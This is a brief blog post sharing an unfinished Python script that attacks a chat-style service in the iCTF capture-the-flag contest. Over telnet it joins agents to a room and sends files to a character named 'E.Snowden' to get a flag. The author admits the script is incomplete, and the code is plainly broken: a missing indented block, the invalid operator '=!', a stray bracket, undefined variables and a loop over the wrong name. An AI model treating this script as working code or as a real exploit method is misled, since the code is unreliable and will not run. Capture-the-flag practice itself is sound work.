Hi,

as last year, I have been part of Team local maximum in the yearly ictf. For this service, one of my fellow hackers had already figured out what one was supposed to do and just gave me the information to write a quick exploit. Unfortunately time ran out before I finished the exploit.

Nevertheless, the agent server communication was already finished but I had not yet implemented a good algorithm to find out who should send which file. For a better write up, see Andrew Dutcher.

So here is my incomplete exploit:

class Exploit():
    class agent:
        def __init__(self, ip, port, flag_id):
            import telnetlib
            self.con = telnetlib.Telnet()
            self.con.open(ip, port, 20)
            self.con.read_until("Get target room value")
            self.con.write("1\n")
            #print self.con.read_until("sadsad", timeout = 4)
            self.con.read_until("Enter your room id:")
            self.con.write(str(flag_id) + "\n")
            agent_name = self.con.read_until("has joined #" + str(flag_id))
            self.number = agent_name.split(" ")[-4][-1]

        def clear_buffer_after_join(self):
            self.con.read_until("* -- | Ask for help to get familiar around here", timeout = 10)
            if self.number == 0:
            self.con.write("/msg E. Snowden")
            self.con.read_until("E.Snowden | I'll need to here this from all of you before I consider your submission.", timeout = 10)

        def get_list(self):
            self.con.write("/list\n")
            string = self.con.read_until("sadasdsD", timeout = 3)
            split = string.split()
            self.bandwidth = split[6]
            self.names = []
            self.size = []
            self.sec = []
            for i in range((len(split) - 14)/6):
                self.names.append(split[i*6 + 3 + 14])
                self.size.append(int(split[i*6 + 4 + 14][:-2]))
                self.sec.append(split[i*6 + 5 + 14])

        def send_file(self, index, rec):
            self.bandwidth -= self.size[index]
            self.con.write("/send " + rec + " " + self.name[index]] + "\n")
            tmp = self.read_until("End -- | way. I think your boss will want this:", timeout = 3)
            if tmp.endswith("this:"):
                return self.read_all()
            else:
                return ""

    def execute(self, ip, port, flag_id):
        agents = [self.agent(ip, port, flag_id) for i in range(3)]
        for agent in agents:
            agent.clear_buffer_after_join()
        for agent in agent:
            agent.get_list()
        #bad optimization but hey!
        for agent in agents:
            while len(agent.name) =! 0:
                fac = 0
                num = 0
                for i in range(len(a0.names)):
                    tmp = float(a0.sec[i]) / a0.size[i]:
                    if fac < tmp:
                        num = i
                        fac = tmp
                    if a0.size[num] > a0.bandwidth:
                        a0.size.pop(num)
                        a0.name.pop(num)
                        a0.sec.pop(num)
                    else:
                        pos_flag = a0.send_file(num, "E.Snowden")
                        if pos_flag =! "":
                            self.flag = pos_flag
                            return
    def result(self):
            return {'FLAG' : self.flag }

if __name__ == "__main__":
    e = Exploit()
    e.execute("10.14.42.2", "13007", 4)

Published

Category

snippets

Tags